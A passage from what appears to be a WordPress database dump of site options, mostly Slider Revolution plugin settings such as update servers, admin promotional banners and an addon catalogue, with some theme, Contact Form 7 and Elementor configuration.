\"single_header\";s:17:\"ova,header-banner\";s:13:\"single_footer\";s:10:\"ova,footer\";s:11:\"blog_footer\";s:10:\"ova,footer\";s:4:\"logo\";s:78:\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\";s:23:\"blog_single_show_author\";s:2:\"no\";s:20:\"blog_single_show_tag\";s:3:\"yes\";s:34:\"blog_single_show_share_social_icon\";s:3:\"yes\";s:31:\"blog_single_show_next_prev_post\";s:3:\"yes\";s:13:\"global_layout\";s:9:\"layout_1c\";s:18:\"header_archive_sev\";s:17:\"ova,header-banner\";s:18:\"archive_footer_sev\";s:10:\"ova,footer\";s:17:\"header_single_sev\";s:17:\"ova,header-banner\";s:17:\"single_footer_sev\";s:10:\"ova,footer\";s:20:\"ova_sev_total_record\";s:1:\"3\";s:19:\"general_line_height\";s:5:\"1.9em\";s:18:\"woo_archive_layout\";s:13:\"woo_layout_2l\";s:17:\"woo_sidebar_width\";s:3:\"280\";s:22:\"woo_archive_show_title\";s:2:\"no\";s:21:\"ova_sev_single_layout\";s:9:\"layout_2l\";s:29:\"woo_product_detail_show_title\";s:3:\"yes\";s:36:\"woo_product_detail_show_share_social\";s:3:\"yes\";s:25:\"ova_project_column_layout\";s:12:\"three_column\";}','yes'),(209,'wpcf7','a:2:{s:7:\"version\";s:5:\"5.6.4\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1668396498;s:7:\"version\";s:5:\"5.6.4\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(210,'elementor_active_kit','10','yes'),(211,'elementor_font_display','swap','yes'),(214,'revslider_servers','a:3:{i:0;s:22:\"themepunch-ext-a.tools\";i:1;s:22:\"themepunch-ext-b.tools\";i:2;s:22:\"themepunch-ext-c.tools\";}','yes'),(215,'revslider_server_refresh','1718916517','yes'),(216,'revslider-update-check-short','1719915778','yes'),(217,'revslider-connection','1','yes'),(218,'revslider-update-hash','edd9d8ff8d6a7e11c07bfe1328770dd4','yes'),(219,'revslider-latest-version','6.7.14','yes'),(220,'revslider-stable-version','4.2.0','yes'),(221,'revslider-notices','a:2:{i:0;O:8:\"stdClass\":9:{s:7:\"version\";s:5:\"0.9.9\";s:4:\"text\";s:952:\"<div style=\"display: block; background: #1b0e41;text-align: center; height:300px;\"><noscript><img src=\"//updates.themepunch-ext-a.tools//banners/rs60/cyberweek.jpg\" usemap=\"#srbannermap\" style=\"min-width:920px;height:300px;display: inline-block;\"></noscript><img usemap=\"#srbannermap\" style=\"min-width:920px;height:300px;display: inline-block;\" src=\"//updates.themepunch-ext-a.tools//banners/rs60/cyberweek.jpg\"></div>\n<map name=\"srbannermap\">\n    <area target=\"_blank\" alt=\"Slider Revolution\" title=\"Slider Revolution\" href=\"https://www.sliderrevolution.com/black-friday-and-cyber-monday-sale/?utm_source=admin&utm_medium=banner&utm_campaign=srusers&utm_content=cyberweeks22\" coords=\"569,135,890,196\" shape=\"rect\">\n    <area target=\"_blank\" alt=\"Essential Grid\" title=\"Essential Grid\" href=\"https://www.essential-grid.com/?utm_source=admin&utm_medium=banner&utm_campaign=esgusers&utm_content=cyberweeks22\" coords=\"570,200,889,260\" shape=\"rect\">\n</map>\";s:4:\"code\";s:9:\"TPSRCW111\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}i:1;O:8:\"stdClass\":10:{s:7:\"version\";s:5:\"9.9.9\";s:4:\"text\";s:527:\"<div style=\"display: block; background: #0d0d0e;text-align: center; height: 504px;\"><a href=\"https://account.sliderrevolution.com/portal/pricing/?utm_source=admin&utm_medium=banner&utm_campaign=srusers&utm_content=getpremium3\" target=\"_blank\" rel=\"noopener\"><video style=\"object-fit: cover; background-size: cover; opacity: 1; width: 900px; height: 504px; display: inline-block;\" muted loop autoplay preload=\"auto\"><source src=\"//updates.themepunch-ext-a.tools//banners/rs60/buypremium3.mp4\" type=\"video/mp4\"></video></a></div>\";s:4:\"code\";s:11:\"TPSNOTR3011\";s:5:\"color\";s:5:\"green\";s:7:\"disable\";b:0;s:10:\"registered\";b:0;s:9:\"is_global\";b:0;s:4:\"type\";s:1:\"3\";s:10:\"show_until\";s:19:\"0000-00-00 00:00:00\";s:10:\"additional\";a:0:{}}}','yes'),(222,'revslider-additions','O:8:\"stdClass\":2:{s:9:\"templates\";O:8:\"stdClass\":3:{s:9:\"tutorials\";a:3:{i:0;O:8:\"stdClass\":2:{s:5:\"title\";s:19:\"Rapid Fire Overview\";s:3:\"url\";s:49:\"https://www.youtube.com/watch?v=LRNTFu-MFgw&t=25s\";}i:1;O:8:\"stdClass\":2:{s:5:\"title\";s:34:\"Responsiveness in Edited Templates\";s:3:\"url\";s:43:\"https://www.youtube.com/watch?v=hP4oV8SWgKY\";}i:2;O:8:\"stdClass\":2:{s:5:\"title\";s:16:\"Animation Basics\";s:3:\"url\";s:43:\"https://www.youtube.com/watch?v=nn3azizwpbs\";}}s:5:\"guide\";O:8:\"stdClass\":3:{s:5:\"title\";s:78:\"Require Expert Technical Advice?<br />Submit a Ticket for Dedicated 1on1 Help.\";s:3:\"url\";s:36:\"https://support.sliderrevolution.com\";s:3:\"img\";s:67:\"//updates.themepunch-ext-a.tools/banners/default_template_guide.jpg\";}s:6:\"bottom\";O:8:\"stdClass\":2:{s:5:\"title\";s:32:\"Load A Template From The Library\";s:3:\"img\";s:61:\"//updates.themepunch-ext-a.tools/banners/guide_mod_banner.png\";}}s:7:\"selling\";b:1;}','yes'),(223,'rs-addons-counter','33','yes'),(224,'revslider-addons','O:8:\"stdClass\":33:{s:28:\"revslider-particlewave-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"380\";s:9:\"releaseid\";s:2:\"29\";s:4:\"slug\";s:28:\"revslider-particlewave-addon\";s:12:\"version_from\";s:6:\"6.5.15\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Particle Wave\";s:6:\"line_1\";s:36:\"Create 3D particle and polygon grids\";s:6:\"line_2\";s:40:\"with lots of style and animation options\";s:9:\"available\";s:5:\"1.1.5\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:1:\"9\";s:11:\"last_update\";s:10:\"2023-08-24\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:79:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_particlewave.jpg\";s:8:\"img_file\";s:46:\"revslider/addons/images/addon_particlewave.jpg\";s:7:\"img_md5\";s:32:\"623bec30f175f4cc541048f1d6d5fd07\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PW\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:25:\"revslider-particles-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"424\";s:9:\"releaseid\";s:1:\"7\";s:4:\"slug\";s:25:\"revslider-particles-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Particle Effects\";s:6:\"line_1\";s:17:\"Let\'s Parti(cle)!\";s:6:\"line_2\";s:51:\"Add interactive particle animations to your sliders\";s:9:\"available\";s:5:\"3.3.3\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:2:\"10\";s:11:\"last_update\";s:10:\"2023-07-28\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_particles.jpg\";s:8:\"img_file\";s:43:\"revslider/addons/images/addon_particles.jpg\";s:7:\"img_md5\";s:32:\"b668a4015ddc6a532b43bb558967a062\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PT\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:27:\"revslider-bubblemorph-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"405\";s:9:\"releaseid\";s:2:\"20\";s:4:\"slug\";s:27:\"revslider-bubblemorph-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:11:\"BubbleMorph\";s:6:\"line_1\";s:26:\"Include BubbleMorph Layers\";s:6:\"line_2\";s:33:\"for a decorative lava lamp effect\";s:9:\"available\";s:5:\"6.7.2\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"20\";s:11:\"last_update\";s:10:\"2024-04-19\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_bubblemorph.jpg\";s:8:\"img_file\";s:45:\"revslider/addons/images/addon_bubblemorph.jpg\";s:7:\"img_md5\";s:32:\"22d03d5de3034069c6db1fdeafd467cd\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BM\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:30:\"revslider-transitionpack-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"369\";s:9:\"releaseid\";s:2:\"28\";s:4:\"slug\";s:30:\"revslider-transitionpack-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:20:\"Advanced Transitions\";s:6:\"line_1\";s:43:\"Add never-before-seen slide transitions to \";s:6:\"line_2\";s:42:\"Slider Revolution with the power of WEBGL.\";s:9:\"available\";s:5:\"1.0.6\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:2:\"30\";s:11:\"last_update\";s:10:\"2023-02-23\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_transition.jpg\";s:8:\"img_file\";s:44:\"revslider/addons/images/addon_transition.jpg\";s:7:\"img_md5\";s:32:\"fe0f1c539053620039a0ad96c4ac27e6\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"AT\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:27:\"revslider-beforeafter-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"404\";s:9:\"releaseid\";s:2:\"15\";s:4:\"slug\";s:27:\"revslider-beforeafter-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Before & After\";s:6:\"line_1\";s:35:\"Compare two slides before and after\";s:6:\"line_2\";s:33:\"use it vertically or horizontally\";s:9:\"available\";s:5:\"3.1.0\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:2:\"40\";s:11:\"last_update\";s:10:\"2023-05-20\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_beforeafter.jpg\";s:8:\"img_file\";s:45:\"revslider/addons/images/addon_beforeafter.jpg\";s:7:\"img_md5\";s:32:\"5a34f20417a7874e1b95693ef37a0758\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BA\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:26:\"revslider-typewriter-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"418\";s:9:\"releaseid\";s:1:\"3\";s:4:\"slug\";s:26:\"revslider-typewriter-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"Typewriter Effect\";s:6:\"line_1\";s:27:\"Enhance your slider\'s text \";s:6:\"line_2\";s:24:\"with typewriter effects \";s:9:\"available\";s:5:\"3.0.6\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:2:\"50\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_typewriter.jpg\";s:8:\"img_file\";s:44:\"revslider/addons/images/addon_typewriter.jpg\";s:7:\"img_md5\";s:32:\"727b604f6fd3fc55894ba50eb566efed\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"TW\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:25:\"revslider-mousetrap-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"410\";s:9:\"releaseid\";s:2:\"24\";s:4:\"slug\";s:25:\"revslider-mousetrap-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Mousetrap\";s:6:\"line_1\";s:31:\"Create all kinds of interesting\";s:6:\"line_2\";s:19:\" mouse interactions\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"60\";s:11:\"last_update\";s:10:\"2021-10-20\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_mousetrap.jpg\";s:8:\"img_file\";s:43:\"revslider/addons/images/addon_mousetrap.jpg\";s:7:\"img_md5\";s:32:\"2329053c3b1d19bdaee131c3dc258d3a\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:28:\"revslider-liquideffect-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"409\";s:9:\"releaseid\";s:2:\"21\";s:4:\"slug\";s:28:\"revslider-liquideffect-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Distortion\";s:6:\"line_1\";s:22:\"Add Distortion Effects\";s:6:\"line_2\";s:30:\"to your slides and transitions\";s:9:\"available\";s:5:\"3.0.3\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"70\";s:11:\"last_update\";s:10:\"2021-10-20\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_distortion.jpg\";s:8:\"img_file\";s:44:\"revslider/addons/images/addon_distortion.jpg\";s:7:\"img_md5\";s:32:\"c26c52a563008b7dc907a288c1e4bb8e\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LE\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:22:\"revslider-lottie-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"420\";s:9:\"releaseid\";s:2:\"25\";s:4:\"slug\";s:22:\"revslider-lottie-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Lottie\";s:6:\"line_1\";s:53:\"Adds support for the popular Lottie Animation format,\";s:6:\"line_2\";s:70:\" including animation control, style customization and a local library.\";s:9:\"available\";s:5:\"3.1.2\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"80\";s:11:\"last_update\";s:10:\"2023-06-26\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_lottie.jpg\";s:8:\"img_file\";s:40:\"revslider/addons/images/addon_lottie.jpg\";s:7:\"img_md5\";s:32:\"4aa677a45bb13732e4f10bcb632afcce\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LT\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:26:\"revslider-paintbrush-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"411\";s:9:\"releaseid\";s:2:\"23\";s:4:\"slug\";s:26:\"revslider-paintbrush-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Paintbrush\";s:6:\"line_1\";s:14:\"Paint or Erase\";s:6:\"line_2\";s:22:\"your background images\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:2:\"90\";s:11:\"last_update\";s:10:\"2023-08-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_paintbrush.jpg\";s:8:\"img_file\";s:44:\"revslider/addons/images/addon_paintbrush.jpg\";s:7:\"img_md5\";s:32:\"308a56289b9a29d1916c2acfc141b699\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PB\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:22:\"revslider-charts-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"483\";s:9:\"releaseid\";s:2:\"27\";s:4:\"slug\";s:22:\"revslider-charts-addon\";s:12:\"version_from\";s:6:\"6.5.17\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Charts\";s:6:\"line_1\";s:93:\"The Charts addon allows you to create visually impressive line or bar graphs from .csv data, \";s:6:\"line_2\";s:56:\"with tons of options to take full control of the design.\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:0:\"\";s:4:\"sort\";s:3:\"100\";s:11:\"last_update\";s:10:\"2022-08-04\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_charts.jpg\";s:8:\"img_file\";s:40:\"revslider/addons/images/addon_charts.jpg\";s:7:\"img_md5\";s:32:\"d2c184371a575faade425c0377c1fdbd\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"CH\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:22:\"revslider-slicey-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"417\";s:9:\"releaseid\";s:2:\"13\";s:4:\"slug\";s:22:\"revslider-slicey-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Slicey\";s:6:\"line_1\";s:20:\"Slice \'em up nicely!\";s:6:\"line_2\";s:38:\"Create image slices of your background\";s:9:\"available\";s:5:\"6.7.2\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"110\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_slicey.jpg\";s:8:\"img_file\";s:40:\"revslider/addons/images/addon_slicey.jpg\";s:7:\"img_md5\";s:32:\"28afd29b7738a452194f0a0bc1d21cbe\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SL\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:25:\"revslider-filmstrip-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"422\";s:9:\"releaseid\";s:2:\"10\";s:4:\"slug\";s:25:\"revslider-filmstrip-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Filmstrip\";s:6:\"line_1\";s:44:\"Display a continously rotating set of images\";s:6:\"line_2\";s:26:\"for your slide backgrounds\";s:9:\"available\";s:5:\"3.0.6\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"125\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_filmstrip.jpg\";s:8:\"img_file\";s:43:\"revslider/addons/images/addon_filmstrip.jpg\";s:7:\"img_md5\";s:32:\"dac40ee57d2be9aaf01faacf51ccb412\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FS\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:27:\"revslider-maintenance-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"421\";s:9:\"releaseid\";s:1:\"4\";s:4:\"slug\";s:27:\"revslider-maintenance-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:15:\"Coming & Maint.\";s:6:\"line_1\";s:37:\"Simple Coming Soon & Maintenance Page\";s:6:\"line_2\";s:42:\"Let your visitors know what\'s up and when!\";s:9:\"available\";s:5:\"3.0.0\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"127\";s:11:\"last_update\";s:10:\"2023-07-17\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:84:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_underconstruction.jpg\";s:8:\"img_file\";s:51:\"revslider/addons/images/addon_underconstruction.jpg\";s:7:\"img_md5\";s:32:\"17f8cba84931541c065cfb1943edafb2\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:24:\"revslider-revealer-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"416\";s:9:\"releaseid\";s:2:\"19\";s:4:\"slug\";s:24:\"revslider-revealer-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Reveal\";s:6:\"line_1\";s:9:\"Reveal...\";s:6:\"line_2\";s:37:\"...your inner beast... and RevSliders\";s:9:\"available\";s:5:\"3.0.3\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"130\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_reveal.jpg\";s:8:\"img_file\";s:40:\"revslider/addons/images/addon_reveal.jpg\";s:7:\"img_md5\";s:32:\"a7ce4bf5eb6fdc1497ed6276ca623046\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RV\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:24:\"revslider-panorama-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"423\";s:9:\"releaseid\";s:2:\"17\";s:4:\"slug\";s:24:\"revslider-panorama-addon\";s:12:\"version_from\";s:5:\"6.5.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"Panorama\";s:6:\"line_1\";s:14:\"Panorama AddOn\";s:6:\"line_2\";s:28:\"Display images in 360 degree\";s:9:\"available\";s:5:\"3.0.9\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"135\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:75:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_panorama.jpg\";s:8:\"img_file\";s:42:\"revslider/addons/images/addon_panorama.jpg\";s:7:\"img_md5\";s:32:\"210953d59903bed91688138cb60777d2\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:27:\"revslider-scrollvideo-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"396\";s:9:\"releaseid\";s:2:\"26\";s:4:\"slug\";s:27:\"revslider-scrollvideo-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Scroll Video\";s:6:\"line_1\";s:114:\"This addon allows you to generate a sequence of images from any html5 video and play them with scroll interaction.\";s:6:\"line_2\";s:49:\"Quality options are included for optimal results!\";s:9:\"available\";s:5:\"3.0.2\";s:10:\"background\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_scrollvideo.jpg\";s:15:\"background_file\";s:45:\"revslider/addons/images/addon_scrollvideo.jpg\";s:14:\"background_md5\";s:32:\"82b2706dfa20a7b0cfabfe7ff28562f9\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"140\";s:11:\"last_update\";s:10:\"2021-12-23\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":5:{s:3:\"img\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_scrollvideo.jpg\";s:8:\"img_file\";s:45:\"revslider/addons/images/addon_scrollvideo.jpg\";s:7:\"img_md5\";s:32:\"82b2706dfa20a7b0cfabfe7ff28562f9\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SV\";}s:6:\"banner\";s:0:\"\";s:11:\"banner_file\";s:0:\"\";s:10:\"banner_md5\";s:0:\"\";s:4:\"tags\";a:0:{}}s:31:\"revslider-explodinglayers-addon\";O:8:\"stdClass\":22:{s:2:\"id\";s:3:\"407\";s:9:\"releaseid\";s:2:\"22\";s:4:\"slug\";s:31:\"revslider-explodinglayers-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Exploding Layers\";s:6:\"line_1\";s:23:\"Add explosive particles\";s:6:\"line_2\";s:24:\"to your layers animation\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:15:\"background_file\";s:0:\"\";s:14:\"background_md5\";s:0:\"\";s:6:\"button\";s:6:\"How 